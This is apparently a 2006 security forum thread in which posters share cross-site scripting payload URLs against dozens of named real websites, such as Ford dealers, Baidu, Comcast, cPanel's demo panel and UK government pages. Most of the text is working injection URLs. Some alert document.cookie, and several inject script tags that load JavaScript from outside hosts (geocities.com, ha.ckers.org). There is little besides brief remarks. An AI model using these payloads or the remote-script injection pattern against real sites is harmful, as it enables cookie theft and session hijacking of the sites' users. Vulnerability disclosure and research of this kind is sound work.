http://www.fordvillage.com/pages/present/flm/notlocalized/searchinventory/dosearch.asp?model=');</script><script>alert(document.cookie);</script>&vehicletype=Car&year=2007&qs=1

http://www.carthagefordmercury.com/pages/present/flm/notlocalized/searchinventory/dosearch.asp?model=');</script><script>alert(document.cookie);</script>&vehicletype=Car&year=2007&qs=1

http://www.republicford.com/pages/present/flm/notlocalized/searchinventory/dosearch.asp?model=');</script><script>alert(document.cookie);</script>&vehicletype=Car&year=2007&qs=1

Seems like all the ford websites that use these scripts are vulnerable...

http://www.fbcneosho.com/templates/System/details.asp?id=22083&PG=';--></script><script>alert('xss');</script>//&Style=&RecordType=&pkg=

http://www.weather.com/search/search?where=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&what=Weather36HourUndeclared&x=18&lswe=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&lswa=Weather36HourUndeclared&GO=GO&whatprefs=&y=9&whatprefs=&GO=GO&lswe=&lswa=

http://www.taylormadehomes.com/search.asp "><script>alert('xss');</script>

http://search.bestwestern.com/?q=%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&x=7&y=8

http://search.xanga.com/searchxanga.aspx?q="><script>alert('xss');</script>

http://usachambers.com/neosho/directory.asp <script>alert('xss');</script>

They filtered the input on numerous pages, but...
http://www.neoshodailynews.com/calendar/?showdate=<script>alert('xss');</script>&cal=default

First posting:

"https://secure.myblackbook.org/error.aspx?aspxerrorpath="></script><script>javascript:alert('xss')</script>"

This site is supposed to securely keep your secrets.

Second Posting:

I thought Freepers were strong on defense?

http://www.freerepublic.com/perl/resend

Put script in the screenname field,like "></script><script>javascript:alert('xss')</script>

I guess I shouldn't expect much from philosophers.

http://www.philosophersnet.com/games/quiz.htm

Enter script in "Your Name".

Send a loved one an erotic postcard from "The Erotic Sketchbook". Or an XSS.

First, pick out a lovely postcard: http://www.gradiva.com/postcard/ then hit "Write Card", which takes you to:
http://www.gradiva.com/cgi/card.cgi

Enter script in the "Name" fields and hit "Preview"

What a turn on!

Check out this one:

http://www.geograph.org.uk/search.php?i=669408

Look at the URI, no XSS. well, go click on it, the XSS is stored!
nifty heh.. it stores just your search query, so also XSS. *sigh*


http://www.centerforsecuritypolicy.org/index.jsp?section=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C%22
http://www.websense.com/securitylabs/alerts/search.php?Search=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.ds-osac.org/Search/index.cfm?display=keyword&query=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C%22
http://search.novell.com/qfsearch/SearchServlet?bbshow=true&bbindex=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3C%22&theme=&encoding=iso-8859-1&retencoding=iso-8859-1&lang=en&country=us&noredirect=&collection=&query=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%3C%22&hdrsrchsubmit=Search
http://www.gesecurity.com/portal/site/GESecurity/template.PAGE/menuitem.5ad454247f0dd40c8e6e9510c4030730/?javax.portlet.tpst=60ce1368aadd940c8e6e9510c4030730&javax.portlet.prp_60ce1368aadd940c8e6e9510c4030730_viewID=MY_PORTAL_VIEW&javax.portlet.begCacheTok=token&javax.portlet.endCacheTok=token
http://www.techworld.com/search/index.cfm?thecriteria=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3C%22
http://www.sciencedaily.com/search/?keyword=%5C%3CsCRIPT%3Ealert%28%22XSS%22%29%3C%2FsCRIPT%3E%5C
http://www.perfumeemporium.com/BulletinBoard/index.cfm?fragrance=-0000000000%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
http://www.fender.com/products/search.php?search=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
http://pin.primate.wisc.edu/search.php?words=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3C%22
http://kaos.erin.gov.au/search.php?query=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&theme=all
http://www.llewellyn.com/bookstore/search.php?sec=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.zdnetasia.com/search/?query=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%3C%22&collection=enterprise&x=14&y=2
http://www.intelliquestmedia.com/store/search.php?a=search&terms=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&srch=ALL
http://www.hidden-treasures.co.uk/search.php?search=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
http://www.bigstockphoto.com/search.php?photo_name=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&x=0&y=0
http://www.sgi.com/cgi-bin/search?q=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%3C%22&btnG=&client=sgi&proxystylesheet=http%3A%2F%2Fwww.sgi.com%2Fstyles%2Fnew%2Fsgi_xslt.html&output=xml_no_dtd&site=sgi

Cookie hell: (i warned you :)
http://www.computerworld.com/action/search.do?command=basicSearch&searchTerms=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&x=0&y=0

Thanks, cheney_usa and welcome to the forums! Way to come out with a bang.

- RSnake
Gotta love it. http://ha.ckers.org

http://www.chicagotribune.com/search/dispatcher.front?Query=%22%3Balert%28%27xss%27%29%3B+y%3D%22&target=article

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

This is actually a cool idea for a site. Make people pay to send me emails. I'd make my family pay an arm and a leg. Anyway, they also have an XSS vuln:

https://www.boxbe.com/ama/reg_basic?usernm=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&x=0&y=0

- RSnake
Gotta love it. http://ha.ckers.org

Wanna see your stock options:
http://iracs.isg.de/eads/2005/chart_fr_2005.htm?ACTIVE=PSE&hist=12m&from=&to=&symb3=BA.NYS&TYPE=-1&CTYPE=0&AVG1=%22%3E%3Cscript%3Ealert('XSS');%3C/script%3E&AVG2=0

Should I feel ashame about web security in France ?
http://www.michelin.fr/fr/front/search.jsp?query=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3Ckikoo-lol=&ok.x=12&ok.y=8
http://vachercher.lycos.fr/cgi-bin/pursuit?query=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&x=10&y=13&tld=com&family=off&inpcatvalue=web&cat=web

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher



Edited 2 time(s). Last edit at 12/14/2006 06:34PM by nEUrOO.

It appears XSS is going up! ;)

- RSnake
Gotta love it. http://ha.ckers.org

didn't know what to do this evening...

It's comcastic
http://sitesearch.comcast.com/?q=%22%3B+alert%28%22XSS%22%29%3B+foo%3D%22&LevelNum=1&LevelId=1&sec=&c=com&corp=

Look at the title tag, the html entities are parsed, but not for the search... crazy
http://www.wordreference.com/es/translation.asp?tranword=%3Cscript%3Ealert(%22XSS%22);%3C/script%3E

https://www.gamasutra.com/php-bin/login.php?from=&email=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3C%22

nEUrOO -- http://rgaucher.info -- http://twitter.com/rgaucher



Edited 3 time(s). Last edit at 12/14/2006 07:33PM by nEUrOO.

Netsmart? I don't think so.

http://www.undernet.com.cy/?q=%3Cscript%3Ejavascript:alert(document.cookie)%3C/script%3E

Well at least they have a sense of humor.

http://www.laughteryoga.org/error.php

Insert script in the form fields. OOOOMMMMMMM!!!!!

When you go to San Francisco, Make sure and wear an XSS in your hair

http://www.sfgate.com/cgi-bin/qws/ff/qr?term=%22%3E%3C%2Fscript%3E%3Cscript%3Ejavascript%3Aalert%28%27xss%27%29%3C%2Fscript%3E&Go=GO&Submit=S

http://www.ip2phrase.com/ip2phrase.asp?template=%3Cscript%3Ealert('xss');%3C/script%3E

cPanel
http://demo.cpanel.net:2082/frontend/x/diskusage/index.html?showtree=%22%3E%3Cscript%20src=http://www.geocities.com/ghozt64/css.js%3F
http://demo.cpanel.net:2082/frontend/x/htaccess/dohtaccess.html?dir=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fgeocities.com%2Fghozt64%2Fcss.js%3F
Username: xdemo
Password: xdemo

WHM
http://demo.cpanel.net:2086/scripts/showbw?showres=&sortreq=used&month=12%22%3E%3Cscript%20src=http://geocities.com/ghozt64/css.js%3F&year=2006
http://demo.cpanel.net:2086/scripts2/addpkg?name=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fgeocities.com%2Fghozt64%2Fcss.js%3F&maxftp=unlimited&maxpop=unlimited&maxlst=unlimited&maxsql=unlimited&maxsub=unlimited&maxpark=0&maxaddon=0&cgi=1&quota=unlimited&bwlimit=unlimited&cpmod=x&featurelist=default
http://demo.cpanel.net:2086/scripts/killpkg?pkg=%22%3E%3Cscript%20src=http://geocities.com/ghozt64/css.js%3F&submit-domain=Delete
http://demo.cpanel.net:2086/scripts/editpkg?pkg=%22%3E%3Cscript%20src=http://geocities.com/ghozt64/css.js%3F&submit-domain=Edit
http://demo.cpanel.net:2086/scripts2/dofeaturemanager?action=addfeature&feature=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fgeocities.com%2Fghozt64%2Fcss.js%3F
http://demo.cpanel.net:2086/scripts/killdns?domain=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fgeocities.com%2Fghozt64%2Fcss.js%3F
http://demo.cpanel.net:2086/scripts/editzone?domain=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fgeocities.com%2Fghozt64%2Fcss.js%3F
http://demo.cpanel.net:2086/scripts/doeditmx?domain=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fgeocities.com%2Fghozt64%2Fcss.js%3F
http://demo.cpanel.net:2086/scripts/park?ndomain=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fgeocities.com%2Fghozt64%2Fcss.js%3F
http://demo.cpanel.net:2086/scripts2/domts2?domain=%22%3E%3Cscript+src%3Dhttp%3A%2F%2Fgeocities.com%2Fghozt64%2Fcss.js%3F
http://demo.cpanel.net:2082/frontend/x3/resellers/branding/delstyleconfirm.html?pkg=%22%3E%3Cscript%20src=http://geocities.com/ghozt64/css.js%3F
Username:demo
Password:demo

Ooh, that's gotta hurt.
There are probably more in cPanel, but the demo blocks quite a few features.
(Used a js file that's not on ckers.org to avoid any problems.)



Edited 6 time(s). Last edit at 12/18/2006 05:13PM by Ghozt.

very nice..

-maluc

Clever finds Ghozt! *hands up*

Baidu, the biggest search engine in China.
http://www.baidu.com/s?tn=baiduadv&q1=&q6=%3e%3cscript%20src=http://ha.ckers.org/xss.js%3e

And the login page.
http://passport.baidu.com/?login&tpl=%22%3e%3cscript%3ealert(String.fromCharCode(88,83,83))%3c/script%3e

- Hong

If we are doing foreign sites :P

Large norwegian search-engine:
http://sesam.no/search/?q=%22%3E%3CSCRIPT%3Ea%3D%2FXSS%2F%3Balert%28a.source%29%3C%2FSCRIPT%3E&c=d&x=39&y=9

Newspaper:
http://www.dagbladet.no/tekstarkiv/index.php?string=%22%3E%3CSCRIPT%3Ea%3D%2FXSS%2F%3Balert%28a.source%29%3C%2FSCRIPT%3E

TV Channel:
http://www.tvnorge.no/index_sok_html?area=internet&searchString=%22%3E%3CSCRIPT%3Ea%3D%2FXSS%2F%3Balert%28a.source%29%3C%2FSCRIPT%3E&submit=S%D8K

Some random page with lots of links:
http://dyn.nesteklikk.no/search/index.html?searchstring=%22%3E%3CSCRIPT%3Ea%3D%2FXSS%2F%3Balert%28a.source%29%3C%2FSCRIPT%3E&type=article&search.x=0&search.y=0

For looking up phone numbers etc.:
http://www.gulesider.no/gs/categoryList.c?q=%3CSCRIPT%3Ea%3D%2FXSS%2F%3Balert%28a.source%29%3C%2FSCRIPT%3E

Another newspaper:
http://nettavisen.by.com/nyheter.asp?so=filewrite%5Bd%5D&query=%22%3E%3CSCRIPT%3Ea%3D%2FXSS%2F%3Balert%28a.source%29%3C%2FSCRIPT%3E&Next.x=8&Next.y=7

Blogging site:
http://blogg.sol.no//search?q=%22%3E%3CSCRIPT%3Ea%3D%2FXSS%2F%3Balert%28a.source%29%3C%2FSCRIPT%3E

Social network site:
http://blink.dagbladet.no/search/pursuit.html?from_age=2000-09-28&to_age=1907-09-28&show_large_images=1907-09-28&nick=%22%3E%3C%53%43%52%49%50%54%3E%61%3D%2F%58%53%53%2F%3B%61%6C%65%72%74%28%61%2E%73%6F%75%72%63%65%29%3C%2F%53%43%52%49%50%54%3E&submit2=s%F8k

Found these months ago, in september. They all use this vector:

"><SCRIPT>a=/XSS/;alert(a.source)</SCRIPT>

I came to the point were I just remembered a site on the top of my head, pasted that vector into its search field and said "bingo!".

It's not really interesting anymore. It is more common for the XSS to succeed than to fail.



Edited 2 time(s). Last edit at 12/22/2006 10:04AM by Torstein.

http://developer.mozilla.org/en/docs/Special:Nutch?language=en&start=0&hitsPerPage=10&query=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2Fscript%3E&fulltext=Search

So, how's about that xpi PoC?

Although that is probably the slowest XSS I've ever seen it's a great find! Way to go, Ghozt. Although developer.mozilla.org isn't in the exception list, that's exactly why you shouldn't even have an exception list at all.

- RSnake
Gotta love it. http://ha.ckers.org

Ah, I was afraid of that. I'll poke around a bit more and check out Mozdev.

Ghe... strange them Mozilla Corp boys are visiting my site all of a sudden.
Well If you read this Mozilla boys: I still have not received that extension developer t-shirt that was promissed to developers, almost 3 months ago!
Yeah i can't stand if people make a promise somthing and then just don't do it.

Nice job Ghozt, it's pretty awfull to have holes there.

http://www3.jcpenney.com/jcp/SearchDepartment.aspx?SearchString=--%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&JSEnabled=false&mscssid=6547fdc35e6a949a9863a7a4ccf7fc7a6xMnVNoV5aGoxMnVNoV5aGW200B0E5C8E816D70B8C88F7F638E2EB00EED0635503&cmResetCat=true&submit+search.x=9&submit+search.y=4

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

http://marcopolosearch.org/MPSearch/Alt_Results.asp?orgn_id=5&hdnPerPage=15&hdnFilter=&txtSearchFor='%3E%3Cscript%3Ealert('xss');%3C/script%3E&selUsing=all&session_id=20061222922103373016
http://www.communities.gov.uk/search/error.asp?start=0&perpage=10&col=ODPM&summary=yes&sort=rank&date1=&date2=&category=&doctype=&type=boolean&search=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E

http://www.serif.com/search.asp
"><script>alert('hi');</script>

A software development company...

http://www.scienceandsociety.co.uk/search.asp
"><script>alert('hi');</script>

Ill keep editing this post as more come.

http://www.golfclubexchange.com/search.asp#keyword
"</span>"><script>alert('hi');</script>

http://www.renewal.net/Search.asp
enter script into the search field.

http://www.dfes.gov.uk/research/programmeofresearch/index.cfm?type=5&keywordlist1=0&keywordlist2=0&keywordlist3=0&andor=or&keyword=%3CSCRIPT%3Ealert%28%22eyeced%22%29%3B%3C%2FSCRIPT%3E&x=0&y=0

be gentle with the .gov.uk, cba with arrested.



Edited 3 time(s). Last edit at 12/22/2006 04:10PM by eyeced.

from eyeced's redirect (which is actually a frame injection)

http://www.tritonboats.com/frames_static.asp?redir=javascript:alert('XSS')//

-maluc

I just thought that, that was the most fitting place for it (triton boats).